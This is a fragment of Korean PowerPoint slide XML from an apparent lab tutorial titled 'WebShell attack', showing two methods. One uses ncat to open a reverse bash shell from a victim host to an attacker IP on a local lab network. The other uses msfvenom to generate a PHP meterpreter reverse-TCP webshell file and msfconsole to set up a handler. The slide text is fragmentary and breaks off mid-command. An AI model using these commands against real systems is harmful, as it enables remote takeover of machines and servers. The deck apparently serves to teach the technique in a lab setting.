            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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추가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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ncat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을 이용해 자신의 터미널에서 작업하기</a:t>
            </a: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	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공격자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ip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: 192.168.0.139</a:t>
            </a:r>
          </a:p>
          <a:p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	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상대방 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ip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: 192.168.0.75</a:t>
            </a:r>
          </a:p>
          <a:p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터미널로 돌아와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다음 명령어를 입력해준다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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ncat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–l –p [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포트번호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]</a:t>
            </a:r>
          </a:p>
          <a:p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특정 포트를 열어놓겠다는 명령어이다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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8EC7EF2A-C0A3-4EB2-8F88-1FFEFC8477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268" y="4625510"/>
            <a:ext cx="6234546" cy="96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1602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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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로컬에서 포트를 열어놓았으니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상대방 쪽에서 접속할 차례이다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다음 명령어를 입력한다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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ncat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–e /bin/bash [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공격자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IP] [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포트번호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]</a:t>
            </a:r>
          </a:p>
          <a:p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상대방이 사용하는 쉘이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bash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가 아니라면 다른 쉘을 입력하면 된다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 </a:t>
            </a:r>
          </a:p>
          <a:p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상대방의 쉘을 확인하는 방법은 다음과 같다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  <a:p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grep [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사용자명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] /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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B011E4AF-9170-4482-AE1B-BE3D350A33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231" y="4254733"/>
            <a:ext cx="6004619" cy="1396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5202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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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연결이 되었으니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명령어로 확인해볼 차례이다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  <a:p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ifconfig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명령어로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ip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를 확인해 상대방의 쉘로 들어왔는지 확인한다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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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51286A25-A9D6-4FA8-BB38-A2918E691C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904" y="2312132"/>
            <a:ext cx="6189382" cy="4033245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1852BE5F-9EF3-4050-8600-D9C158A1A772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870312" y="3311238"/>
            <a:ext cx="1457252" cy="2078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53619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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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Php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 확장자로 실행할 페이로드 작성한다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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Msfconsole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접속 후 피해자의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PC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에 접속을 위한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셋팅  한다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F497BAFF-A3AA-4C33-B9B4-00AC67500DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5913238" cy="4686300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Console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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@@@ Kali @@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 –p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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공격자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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공격자포트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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] –f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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mWebshell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# set </a:t>
            </a:r>
            <a:r>
